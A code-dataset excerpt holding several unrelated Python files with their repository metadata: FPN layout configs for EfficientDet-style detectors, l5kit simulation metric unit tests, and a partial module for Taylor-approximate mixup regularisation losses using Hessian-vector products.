Adapted from https://github.com/google/automl/blob/56815c9986ffd4b508fe1d68508e268d129715c1/efficientdet/keras/fpn_configs.py
"""
p = OmegaConf.create()
weight_method = weight_method or 'fastattn'
num_levels = max_level - min_level + 1
node_ids = {min_level + i: [i] for i in range(num_levels)}
level_last_id = lambda level: node_ids[level][-1]
level_all_ids = lambda level: node_ids[level]
id_cnt = itertools.count(num_levels)
p.nodes = []
for i in range(max_level - 1, min_level - 1, -1):
# top-down path.
p.nodes.append({
'reduction': 1 << i,
'inputs_offsets': [level_last_id(i), level_last_id(i + 1)],
'weight_method': weight_method,
})
node_ids[i].append(next(id_cnt))
for i in range(min_level + 1, max_level + 1):
# bottom-up path.
p.nodes.append({
'reduction': 1 << i,
'inputs_offsets': level_all_ids(i) + [level_last_id(i - 1)],
'weight_method': weight_method,
})
node_ids[i].append(next(id_cnt))
return p
def panfpn_config(min_level, max_level, weight_method=None):
"""PAN FPN config.
This defines FPN layout from Path Aggregation Networks as an alternate to
BiFPN, it does not implement the full PAN spec.
Paper: https://arxiv.org/abs/1803.01534
"""
p = OmegaConf.create()
weight_method = weight_method or 'fastattn'
num_levels = max_level - min_level + 1
node_ids = {min_level + i: [i] for i in range(num_levels)}
level_last_id = lambda level: node_ids[level][-1]
id_cnt = itertools.count(num_levels)
p.nodes = []
for i in range(max_level, min_level - 1, -1):
# top-down path.
offsets = [level_last_id(i), level_last_id(i + 1)] if i != max_level else [level_last_id(i)]
p.nodes.append({
'reduction': 1 << i,
'inputs_offsets': offsets,
'weight_method': weight_method,
})
node_ids[i].append(next(id_cnt))
for i in range(min_level, max_level + 1):
# bottom-up path.
offsets = [level_last_id(i), level_last_id(i - 1)] if i != min_level else [level_last_id(i)]
p.nodes.append({
'reduction': 1 << i,
'inputs_offsets': offsets,
'weight_method': weight_method,
})
node_ids[i].append(next(id_cnt))
return p
def qufpn_config(min_level, max_level, weight_method=None):
"""A dynamic quad fpn config that can adapt to different min/max levels.
It extends the idea of BiFPN, and has four paths:
(up_down -> bottom_up) + (bottom_up -> up_down).
Paper: https://ieeexplore.ieee.org/document/9225379
Ref code: From contribution to TF EfficientDet
https://github.com/google/automl/blob/eb74c6739382e9444817d2ad97c4582dbe9a9020/efficientdet/keras/fpn_configs.py
"""
p = OmegaConf.create()
weight_method = weight_method or 'fastattn'
quad_method = 'fastattn'
num_levels = max_level - min_level + 1
node_ids = {min_level + i: [i] for i in range(num_levels)}
level_last_id = lambda level: node_ids[level][-1]
level_all_ids = lambda level: node_ids[level]
level_first_id = lambda level: node_ids[level][0]
id_cnt = itertools.count(num_levels)
p.nodes = []
for i in range(max_level - 1, min_level - 1, -1):
# top-down path 1.
p.nodes.append({
'reduction': 1 << i,
'inputs_offsets': [level_last_id(i), level_last_id(i + 1)],
'weight_method': weight_method
})
node_ids[i].append(next(id_cnt))
node_ids[max_level].append(node_ids[max_level][-1])
for i in range(min_level + 1, max_level):
# bottom-up path 2.
p.nodes.append({
'reduction': 1 << i,
'inputs_offsets': level_all_ids(i) + [level_last_id(i - 1)],
'weight_method': weight_method
})
node_ids[i].append(next(id_cnt))
i = max_level
p.nodes.append({
'reduction': 1 << i,
'inputs_offsets': [level_first_id(i)] + [level_last_id(i - 1)],
'weight_method': weight_method
})
node_ids[i].append(next(id_cnt))
node_ids[min_level].append(node_ids[min_level][-1])
for i in range(min_level + 1, max_level + 1, 1):
# bottom-up path 3.
p.nodes.append({
'reduction': 1 << i,
'inputs_offsets': [
level_first_id(i), level_last_id(i - 1) if i != min_level + 1 else level_first_id(i - 1)],
'weight_method': weight_method
})
node_ids[i].append(next(id_cnt))
node_ids[min_level].append(node_ids[min_level][-1])
for i in range(max_level - 1, min_level, -1):
# top-down path 4.
p.nodes.append({
'reduction': 1 << i,
'inputs_offsets': [node_ids[i][0]] + [node_ids[i][-1]] + [level_last_id(i + 1)],
'weight_method': weight_method
})
node_ids[i].append(next(id_cnt))
i = min_level
p.nodes.append({
'reduction': 1 << i,
'inputs_offsets': [node_ids[i][0]] + [level_last_id(i + 1)],
'weight_method': weight_method
})
node_ids[i].append(next(id_cnt))
node_ids[max_level].append(node_ids[max_level][-1])
# NOTE: the order of the quad path is reversed from the original, my code expects the output of
# each FPN repeat to be same as input from backbone, in order of increasing reductions
for i in range(min_level, max_level + 1):
# quad-add path.
p.nodes.append({
'reduction': 1 << i,
'inputs_offsets': [node_ids[i][2], node_ids[i][4]],
'weight_method': quad_method
})
node_ids[i].append(next(id_cnt))
return p
def get_fpn_config(fpn_name, min_level=3, max_level=7):
if not fpn_name:
fpn_name = 'bifpn_fa'
name_to_config = {
'bifpn_sum': bifpn_config(min_level=min_level, max_level=max_level, weight_method='sum'),
'bifpn_attn': bifpn_config(min_level=min_level, max_level=max_level, weight_method='attn'),
'bifpn_fa': bifpn_config(min_level=min_level, max_level=max_level, weight_method='fastattn'),
'pan_sum': panfpn_config(min_level=min_level, max_level=max_level, weight_method='sum'),
'pan_fa': panfpn_config(min_level=min_level, max_level=max_level, weight_method='fastattn'),
'qufpn_sum': qufpn_config(min_level=min_level, max_level=max_level, weight_method='sum'),
'qufpn_fa': qufpn_config(min_level=min_level, max_level=max_level, weight_method='fastattn'),
}
return name_to_config[fpn_name]
| 36.767568
| 129
| 0.625551
| 987
| 6,802
| 4.037487
| 0.136778
| 0.080301
| 0.061982
| 0.048181
| 0.766123
| 0.766123
| 0.740778
| 0.736512
| 0.707905
| 0.695107
| 0
| 0.026526
| 0.246251
| 6,802
| 184
| 130
| 36.967391
| 0.750731
| 0.151867
| 0
| 0.723077
| 0
| 0
| 0.093113
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030769
| false
| 0
| 0.015385
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e132e88837b42b1102faffe61afb2e9719625a5e
| 42
|
py
|
Python
|
libs/networks/__init__.py
|
Kinpzz/RCRNet-Pytorch
|
8d9f0fe0c7ad651db7578b2d96741de11036ef82
|
[
"MIT"
] | 67
|
2019-11-22T14:50:09.000Z
|
2021-12-21T21:57:55.000Z
|
libs/networks/__init__.py
|
Kinpzz/RCRNet-Pytorch
|
8d9f0fe0c7ad651db7578b2d96741de11036ef82
|
[
"MIT"
] | 6
|
2019-12-03T14:03:57.000Z
|
2021-10-10T11:25:30.000Z
|
libs/networks/__init__.py
|
Kinpzz/RCRNet-Pytorch
|
8d9f0fe0c7ad651db7578b2d96741de11036ef82
|
[
"MIT"
] | 15
|
2019-10-24T08:14:50.000Z
|
2021-09-24T05:56:16.000Z
|
from .models import ImageModel, VideoModel
| 42
| 42
| 0.857143
| 5
| 42
| 7.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e139c1756154bed198885e34ceef206678fb8c1e
| 12,141
|
py
|
Python
|
l5kit/l5kit/tests/cle/test_metrics.py
|
Aspirisha/l5kit
|
40ed7576f803e83fc3f0714e6458635f9f6bfe60
|
[
"Apache-2.0"
] | null | null | null |
l5kit/l5kit/tests/cle/test_metrics.py
|
Aspirisha/l5kit
|
40ed7576f803e83fc3f0714e6458635f9f6bfe60
|
[
"Apache-2.0"
] | null | null | null |
l5kit/l5kit/tests/cle/test_metrics.py
|
Aspirisha/l5kit
|
40ed7576f803e83fc3f0714e6458635f9f6bfe60
|
[
"Apache-2.0"
] | 1
|
2021-07-20T15:23:16.000Z
|
2021-07-20T15:23:16.000Z
|
import unittest
from typing import Any
from unittest import mock
import torch
from l5kit.cle import metrics
from l5kit.evaluation import error_functions
from l5kit.evaluation import metrics as l5metrics
class TestCollisionMetric(unittest.TestCase):
@staticmethod
def create_dummy_metric(dummy_metric_name: str = "dummy_metric") -> Any:
class DummyMetric(metrics.CollisionMetricBase):
metric_name = dummy_metric_name
def __init__(self) -> None:
super().__init__(l5metrics.CollisionType.FRONT)
return DummyMetric()
def test_attributes(self) -> None:
dummy_metric_name = "dummy_metric"
dummy_metric = TestCollisionMetric.create_dummy_metric(dummy_metric_name)
self.assertEqual(dummy_metric.collision_type,
l5metrics.CollisionType.FRONT)
self.assertEqual(dummy_metric.metric_name,
dummy_metric_name)
def test_collision_types(self) -> None:
collision_metric_match = {
l5metrics.CollisionType.FRONT: metrics.CollisionFrontMetric(),
l5metrics.CollisionType.SIDE: metrics.CollisionSideMetric(),
l5metrics.CollisionType.REAR: metrics.CollisionRearMetric(),
}
for collision_type, metric in collision_metric_match.items():
self.assertEqual(metric.collision_type, collision_type)
class TestDisplacementErrorMetric(unittest.TestCase):
def test_same_trajectory(self) -> None:
timesteps = 20
attrs = {
"simulated_ego_states": torch.ones(timesteps, 7),
"recorded_ego_states": torch.ones(timesteps, 7),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
result = metric.compute(sim_output)
self.assertEqual(len(result), timesteps)
self.assertEqual(result.sum(), 0.)
def test_parallel_trajectory(self) -> None:
attrs = {
"simulated_ego_states": torch.ones(20, 7),
"recorded_ego_states": torch.full((20, 7), 2.0),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
result = metric.compute(sim_output)
self.assertEqual(len(torch.unique(result)), 1)
self.assertAlmostEqual(torch.unique(result).item(), 1.4142, 4)
def test_l2_distance_parallel_trajectory(self) -> None:
attrs = {
"simulated_ego_states": torch.ones(20, 7),
"recorded_ego_states": torch.full((20, 7), 2.0),
}
sim_output = mock.Mock(**attrs)
metric_l2_arg = metrics.DisplacementErrorMetric(error_functions.l2_error)
result_l2_arg = metric_l2_arg.compute(sim_output)
metric = metrics.DisplacementErrorL2Metric()
result = metric.compute(sim_output)
# Make sure both results match
self.assertTrue((result_l2_arg == result).all())
def test_half_trajectories(self) -> None:
observed_trajectory = torch.ones(40, 7)
observed_trajectory[20:, :] += 1.0
attrs = {
"simulated_ego_states": torch.ones(40, 7),
"recorded_ego_states": observed_trajectory,
}
sim_output = mock.Mock(**attrs)
metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
result = metric.compute(sim_output)
# This is mainly where displacement diverges from distance to ref traj
self.assertEqual(len(torch.unique(result)), 2)
def test_symmetry(self) -> None:
attrs = {
"simulated_ego_states": torch.ones(20, 7),
"recorded_ego_states": torch.full((20, 7), 2.0),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
result = metric.compute(sim_output)
attrs = {
"simulated_ego_states": torch.full((20, 7,), 2.0),
"recorded_ego_states": torch.ones(20, 7),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
result_switch = metric.compute(sim_output)
self.assertEqual(result.sum(), result_switch.sum())
def test_more_simulation_than_observation(self) -> None:
timesteps = 20
attrs = {
"simulated_ego_states": torch.ones(timesteps + 20, 7),
"recorded_ego_states": torch.ones(timesteps, 7),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DisplacementErrorMetric(error_functions.l2_error)
with self.assertRaisesRegex(ValueError, "More simulated timesteps than observed"):
_ = metric.compute(sim_output)
class TestDistanceToRefTrajectory(unittest.TestCase):
def test_same_trajectory(self) -> None:
attrs = {
"simulated_ego_states": torch.ones(20, 7),
"recorded_ego_states": torch.ones(20, 7),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DistanceToRefTrajectoryMetric()
result = metric.compute(sim_output)
self.assertEqual(result.sum(), 0.)
def test_different_fraction(self) -> None:
simulated_steps = 20
scene_fraction = 0.5
attrs = {
"simulated_ego_states": torch.ones(simulated_steps, 7),
"recorded_ego_states": torch.ones(simulated_steps, 7),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DistanceToRefTrajectoryMetric(scene_fraction)
result = metric.compute(sim_output)
simulated_steps_fraction = int(simulated_steps * scene_fraction)
self.assertEqual(len(result), simulated_steps_fraction)
self.assertEqual(result.sum(), 0.)
def test_symmetry(self) -> None:
attrs = {
"simulated_ego_states": torch.ones(20, 7),
"recorded_ego_states": torch.full((20, 7), 2.0),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DistanceToRefTrajectoryMetric()
result = metric.compute(sim_output)
attrs = {
"simulated_ego_states": torch.full((20, 7), 2.0),
"recorded_ego_states": torch.ones(20, 7),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DistanceToRefTrajectoryMetric()
result_switch = metric.compute(sim_output)
self.assertEqual(result.sum(), result_switch.sum())
def test_parallel_trajectory(self) -> None:
simulated_steps = 20
attrs = {
"simulated_ego_states": torch.ones(simulated_steps, 7),
"recorded_ego_states": torch.full((20, 7), 2.0),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DistanceToRefTrajectoryMetric()
result = metric.compute(sim_output)
# Default fraction should be 80% of the samples
simulated_steps_fraction = int(simulated_steps * 0.8)
self.assertEqual(len(result), simulated_steps_fraction)
self.assertEqual(len(torch.unique(result)), 1)
self.assertAlmostEqual(torch.unique(result).item(), 1.4142, 4)
def test_larger_observed_ego(self) -> None:
simulated_steps = 20
attrs = {
"simulated_ego_states": torch.ones(simulated_steps, 7),
"recorded_ego_states": torch.ones(50, 7),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DistanceToRefTrajectoryMetric()
result = metric.compute(sim_output)
self.assertEqual(result.sum(), 0.)
# Default fraction should be 80% of the samples
simulated_steps_fraction = int(simulated_steps * 0.8)
self.assertEqual(len(result), simulated_steps_fraction)
def test_larger_simulated_ego(self) -> None:
attrs = {
"simulated_ego_states": torch.ones(50, 7),
"recorded_ego_states": torch.ones(20, 7),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DistanceToRefTrajectoryMetric()
with self.assertRaisesRegex(ValueError, "More simulated timesteps than observed"):
_ = metric.compute(sim_output)
def test_half_trajectories(self) -> None:
observed_trajectory = torch.ones(40, 7)
observed_trajectory[20:, :] += 1.0
attrs = {
"simulated_ego_states": torch.ones(40, 7),
"recorded_ego_states": observed_trajectory,
}
sim_output = mock.Mock(**attrs)
metric = metrics.DistanceToRefTrajectoryMetric()
result = metric.compute(sim_output)
self.assertEqual(len(torch.unique(result)), 1)
def test_more_simulation_than_observation(self) -> None:
timesteps = 20
attrs = {
"simulated_ego_states": torch.ones(timesteps + 20, 7),
"recorded_ego_states": torch.ones(timesteps, 7),
}
sim_output = mock.Mock(**attrs)
metric = metrics.DistanceToRefTrajectoryMetric()
with self.assertRaisesRegex(ValueError, "More simulated timesteps than observed"):
_ = metric.compute(sim_output)
class TestSimulatedDrivenMilesMetric(unittest.TestCase):
def test_no_movement_trajectory(self) -> None:
timesteps = 20
attrs = {
"simulated_ego_states": torch.ones(timesteps, 7),
}
sim_output = mock.Mock(**attrs)
metric = metrics.SimulatedDrivenMilesMetric()
result = metric.compute(sim_output)
self.assertEqual(result.size(0), timesteps)
self.assertEqual(result.sum().item(), 0.0)
def test_one_axis_movement_trajectory(self) -> None:
timesteps = 20
attrs = {
"simulated_ego_states": torch.ones(timesteps, 7),
}
# Set one coordinate to always 1 and keep the other
# increasing
increasing_tensor = torch.tensor([i for i in range(timesteps)])
attrs["simulated_ego_states"][..., 1] += increasing_tensor
sim_output = mock.Mock(**attrs)
metric = metrics.SimulatedDrivenMilesMetric()
result = metric.compute(sim_output)
self.assertEqual(result.size(0), timesteps)
# How much is moved for each frame in miles (one meter per frame)
single_step_miles = 1.0 * metrics.SimulatedDrivenMilesMetric.METER_TO_MILES
expected_driven_miles = single_step_miles * (timesteps - 1)
self.assertAlmostEqual(result.sum().item(),
expected_driven_miles, places=3)
# Should have only a zero for the first step and then
# the same step for other frames
self.assertEqual(len(result.unique()), 2)
class TestReplayDrivenMilesMetric(unittest.TestCase):
def test_no_movement_trajectory(self) -> None:
timesteps = 20
attrs = {
"recorded_ego_states": torch.ones(timesteps, 7),
}
sim_output = mock.Mock(**attrs)
metric = metrics.ReplayDrivenMilesMetric()
result = metric.compute(sim_output)
self.assertEqual(result.size(0), timesteps)
self.assertEqual(result.sum().item(), 0.0)
def test_one_axis_movement_trajectory(self) -> None:
timesteps = 20
tensor_ego_states = torch.ones(timesteps, 7)
# Set one coordinate to always 1 and keep the other
# increasing
tensor_ego_states[:, 0] += torch.arange(0, timesteps)
attrs = {
"recorded_ego_states": tensor_ego_states,
}
sim_output = mock.Mock(**attrs)
metric = metrics.ReplayDrivenMilesMetric()
result = metric.compute(sim_output)
self.assertEqual(result.size(0), timesteps)
# How much is moved for each frame in miles (one meter per frame)
single_step_miles = 1.0 * metrics.ReplayDrivenMilesMetric.METER_TO_MILES
expected_driven_miles = single_step_miles * (timesteps - 1)
self.assertAlmostEqual(result.sum().item(),
expected_driven_miles, places=3)
# Should have only a zero for the first step and then
# the same step for other frames
self.assertEqual(len(result.unique()), 2)
| 40.069307
| 90
| 0.643028
| 1,334
| 12,141
| 5.633433
| 0.126687
| 0.049102
| 0.06334
| 0.064671
| 0.804258
| 0.792415
| 0.763673
| 0.747705
| 0.735196
| 0.71843
| 0
| 0.022185
| 0.253768
| 12,141
| 302
| 91
| 40.201987
| 0.807285
| 0.049831
| 0
| 0.681452
| 0
| 0
| 0.074646
| 0
| 0
| 0
| 0
| 0
| 0.133065
| 1
| 0.08871
| false
| 0
| 0.028226
| 0
| 0.145161
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e19ed1e597ccf9fb9ecd8684156fb9cb06c3c44f
| 61
|
py
|
Python
|
cmstack/hdfg/onnx_hdfg/onnx_helper.py
|
he-actlab/cdstack
|
38f605cfa299bf97b5875a19f9fd811a2671d56f
|
[
"Apache-2.0"
] | null | null | null |
cmstack/hdfg/onnx_hdfg/onnx_helper.py
|
he-actlab/cdstack
|
38f605cfa299bf97b5875a19f9fd811a2671d56f
|
[
"Apache-2.0"
] | null | null | null |
cmstack/hdfg/onnx_hdfg/onnx_helper.py
|
he-actlab/cdstack
|
38f605cfa299bf97b5875a19f9fd811a2671d56f
|
[
"Apache-2.0"
] | null | null | null |
def make_node():
pass
def make_value_info():
pass
| 7.625
| 22
| 0.622951
| 9
| 61
| 3.888889
| 0.666667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.278689
| 61
| 7
| 23
| 8.714286
| 0.795455
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
e1c709f3215825c5bc643e91bf9c3b18c8a64137
| 38
|
py
|
Python
|
test/unit/core/sample_plugins/__init__.py
|
modora/fold
|
c2eded4480cf715794b8f0585df7dba2cc1348f3
|
[
"MIT"
] | null | null | null |
test/unit/core/sample_plugins/__init__.py
|
modora/fold
|
c2eded4480cf715794b8f0585df7dba2cc1348f3
|
[
"MIT"
] | null | null | null |
test/unit/core/sample_plugins/__init__.py
|
modora/fold
|
c2eded4480cf715794b8f0585df7dba2cc1348f3
|
[
"MIT"
] | null | null | null |
from .p1 import P1
from .p2 import P2
| 12.666667
| 18
| 0.736842
| 8
| 38
| 3.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 0.210526
| 38
| 2
| 19
| 19
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
becea6281f75a8789cfdb5c3aa303a671364e681
| 19,875
|
py
|
Python
|
mixup_utils/taylor_losses.py
|
mpsenka21/generalization
|
366c5542787a6e3d51c17daab440fadcb5fb127e
|
[
"MIT"
] | null | null | null |
mixup_utils/taylor_losses.py
|
mpsenka21/generalization
|
366c5542787a6e3d51c17daab440fadcb5fb127e
|
[
"MIT"
] | null | null | null |
mixup_utils/taylor_losses.py
|
mpsenka21/generalization
|
366c5542787a6e3d51c17daab440fadcb5fb127e
|
[
"MIT"
] | null | null | null |
import torch
import numpy as np
from torch.autograd import Variable
# Module to compute and evaluate the Taylor approximate loss in the paper on larger-scale tasks
# - Standard Taylor, global order 2 (eq. 12)
# - Our Taylor, up to order 2 for each \epsilon and \delta (eq. 4)
# --- Note that for cross entropy loss, this only amounts to adding an
# \epsilon\delta^2 term
# (equation refs are taken from "On Mixup Regularization"):
# https://arxiv.org/pdf/2006.06049.pdf
### some modules for computing the necessary covariances, approximately with SVD as needed ###
# takes images and one-hot target vectors as input and computes the means and covariances of the data that are necessary to compute Taylor-approximate loss
def compute_moments(data, targets):
assert(data.shape[0] == targets.shape[0])
num = data.shape[0]
num_classes = targets.shape[1]
x = data.reshape((num, -1))
y = targets.reshape((num, -1))
x_dim = x.shape[1]
xbar = x.mean(axis=0)
xcent = x - xbar
ybar = y.mean(axis=0)
ycent = y - ybar
xxcov = 1/num * torch.matmul(torch.transpose(xcent, 0, 1), xcent)
xycov = 1/num * torch.matmul(torch.transpose(xcent, 0, 1), ycent)
T = torch.zeros((num_classes, x_dim, x_dim)).cuda()
for i in range(num_classes):
# xcent is (num by x_dim)
# T[i,:,:] = E_j(y'_j(c) x'_j x'_j^T)
T[i,:,:] = (1/num)*xcent.t() @ (xcent * ycent[:,i].reshape((num, 1)))
return xbar, ybar, xxcov, xycov, T
# takes a covariance matrix X as input
# and returns U, S, V such that X ~ U * diag(S) * V^T
def decomposition(cov, n_components):
U, S, V = torch.svd(cov)
return U[:, :n_components], S[:n_components], V[:, :n_components]
# manual cross_entropy for single model output x (not necessarily distribution)
# and one-hot encoded label y, each a vector-Pytorch tensor
# needed for hvp (see below)
# X and Y are (N x x/y_dim) matrices, batch size N
# NOTE: changed to natural logarithm by Seyoon
def cross_entropy_manual(X, Y):
# note X.shape[0] is the batch size
X_softmax = X.exp() / X.exp().sum(axis=1).reshape((X.shape[0], 1))
# TODO: check pytorch uses base 2
return -(Y * torch.log(X_softmax)).sum()
# given a pytorch function loss(x_i, y_i) (twice differentiable)
# and a neural network 'model',
# compute matrix-vector products of the form:
# (\nabla_{x1 x2}^2 loss(model(x), y)) @ v
# data_shape is the original shape of the batch tensor (non-flattened
# iamges)
# X is a tensor of size (N, data_dim), where N is the size of the batch,
# and data_dim is the dimension of the input data (flattened)
# Y is a tensor of size (N, c), where c is the number of classes. Each
# row is a Euclidean basis vector corresponding to the true label
# x1 and x2 are strings, either 'x' or 'y'
# --- these indicate which variables to take derivatives w.r.t.
# v is vector to get Hessian's action on
### v should have same dimension as x1, and must be a row vector
# TODO: deal w/ fact that zero hessian returns None object
def hvp(loss, model, data_shape, X, Y, x1, x2, v):
# setting up pytorch stuff to prepare for backprop
vvar = Variable(v, requires_grad=True)
# extract batch size
N = X.shape[0]
Xvar = Variable(X, requires_grad=True)
Yvar = Variable(Y, requires_grad=True)
model_eval = model(Xvar.reshape(data_shape))
# xvar = Variable(X[i,:], requires_grad=True)
# yvar = Variable(Y[i,:], requires_grad=True)
# choose which variable x1var corresponds to
x1var = Xvar if x1=='x' else Yvar
x2var = Xvar if x2=='x' else Yvar
score = loss(model_eval, Yvar)
# gradient w.r.t. entire batch
grad, = torch.autograd.grad(score, x1var, create_graph=True)
# sum over batch elements (avg. at end)
total = torch.sum(grad.sum(axis=0) * vvar)
if Xvar.grad:
Xvar.grad.data.zero_()
if Yvar.grad:
Yvar.grad.data.zero_()
grad2, = torch.autograd.grad(total, x2var, create_graph=True, allow_unused=True)
# sum over rows (different elements in batch)
hvprod = (1/N)*grad2.sum(axis=0)
return hvprod
# computes quadratics of the form \sum w_i H(x_i, y_i) v_i over a batch, where H is a Hessian
# w.r.t. loss
# suppose the batch size is N
# X is a (N by x_dim) matrix, where x_dim is the dimensionality of the data
# Y is a (N by num_classes) matrix
# x1 is a string: 'x' to take the 1st derivative w.r.t. X, 'y' for 1st derivative
# w.r.t. Y
# x2 is a string: "" "" 2nd derivative w.r.t. X, 'y' for 2st derivative
# w.r.t. Y
# V has the same shape as the variable corresponding to x1
# W has the same shape as the variable corresponding to x2
# see comments over hvp for further details
def hess_quadratic(loss, model, data_shape, X, Y, x1, x2, V, W):
# setting up pytorch stuff to prepare for backprop
Vvar = Variable(V, requires_grad=True)
Wvar = Variable(W, requires_grad=True)
# extract batch size
N = X.shape[0]
Xvar = Variable(X, requires_grad=True)
Yvar = Variable(Y, requires_grad=True)
model_eval = model(Xvar.reshape(data_shape))
# choose which variable x1var corresponds to
x1var = Xvar if x1=='x' else Yvar
x2var = Xvar if x2=='x' else Yvar
score = loss(model_eval, Yvar)
# gradient w.r.t. entire batch
grad, = torch.autograd.grad(score, x1var, create_graph=True)
# sum over batch elements (avg. at end)
total = torch.sum(grad * Vvar)
if Xvar.grad:
Xvar.grad.data.zero_()
if Yvar.grad:
Yvar.grad.data.zero_()
# NOTE: THIS WILL NOT ALLOW FURTHER BACKPROP, BRING create_graph=True BACK TO ALLOW THIS
grad2, = torch.autograd.grad(total, x2var, create_graph=False, allow_unused=True)
# sum over rows (different elements in batch)
wHv = torch.sum(W * grad2)
return (1/N)*wHv
# Computes a quadratic of the form w^T \sum_i H(x_i, y_i) v, where H is a Hessian w.r.t. loss
# v, w are vectors that come from an SVD.
#
# v has the same dimension as what x1 corresponds to (x_dim if 'x', num_classes if 'y')
# w has the same dimension as what x2 corresponds to
def hess_svd(loss, model, data_shape, X, Y, x1, x2, v, w):
# setting up pytorch stuff to prepare for backprop
vvar = Variable(v, requires_grad=True)
wvar = Variable(w, requires_grad=True)
# extract batch size
N = X.shape[0]
Xvar = Variable(X, requires_grad=True)
Yvar = Variable(Y, requires_grad=True)
model_eval = model(Xvar.reshape(data_shape))
# choose which variable x1var corresponds to
x1var = Xvar if x1=='x' else Yvar
x2var = Xvar if x2=='x' else Yvar
score = loss(model_eval, Yvar)
# gradient w.r.t. entire batch
grad, = torch.autograd.grad(score, x1var, create_graph=True)
# sum over batch elements (avg. at end)
total = torch.sum(grad.sum(axis=0) * vvar)
if Xvar.grad:
Xvar.grad.data.zero_()
if Yvar.grad:
Yvar.grad.data.zero_()
# NOTE: THIS WILL NOT ALLOW FURTHER BACKPROP, BRING create_graph=True BACK TO ALLOW THIS
grad2, = torch.autograd.grad(total, x2var, create_graph=False, allow_unused=True)
# sum over rows (different elements in batch)
wHv = torch.sum(grad2.sum(axis=0) * wvar)
return (1/N)*wHv
# the equivalent Hessian quadratic form for the epsilon delta^2 terms:
# computes \delta^T (1/N) \sum_i \nabla_{x_ix_i}^2(log(S(model(x_i))_{class_val})) \delta
# See project overleaf for details.
# inputs identical to hess_svd, except for class_val
# class_val indicates which corresponding class the current matrix inner product
# is being taken w.r.t.
def hess_svd_ed2(class_val, model, data_shape, X, Y, x1, x2, v, w):
# setting up pytorch stuff to prepare for backprop
vvar = Variable(v, requires_grad=True)
wvar = Variable(w, requires_grad=True)
# extract batch size
N = X.shape[0]
Xvar = Variable(X, requires_grad=True)
Yvar = Variable(Y, requires_grad=True)
model_eval = model(Xvar.reshape(data_shape))
# here is where we take only the class_val component
model_eval_softmax = model_eval[:,class_val].exp().reshape((N,1)) / model_eval.exp().sum(axis=1).reshape((N, 1))
# choose which variable x1var corresponds to
x1var = Xvar if x1=='x' else Yvar
x2var = Xvar if x2=='x' else Yvar
f_val = torch.log(model_eval_softmax).sum()
# gradient w.r.t. entire batch
grad, = torch.autograd.grad(f_val, x1var, create_graph=True)
# sum over batch elements (avg. at end)
total = torch.sum(grad.sum(axis=0) * vvar)
if Xvar.grad:
Xvar.grad.data.zero_()
if Yvar.grad:
Yvar.grad.data.zero_()
# NOTE: THIS WILL NOT ALLOW FURTHER BACKPROP, BRING create_graph=True BACK TO ALLOW THIS
grad2, = torch.autograd.grad(total, x2var, create_graph=False, allow_unused=True)
# sum over rows (different elements in batch)
wHv = torch.sum(grad2.sum(axis=0) * wvar)
return (1/N)*wHv
# theta_bar is 3/4
# images and labels are not scaled down/flattened
# returns regularization (non-loss) terms
def taylor_loss(images, labels, model, mu_img, mu_y, Uxx, Sxx, Vxx, Uxy, Sxy, Vxy, T_U, T_S, T_V):
# extract batch size
N = images.shape[0]
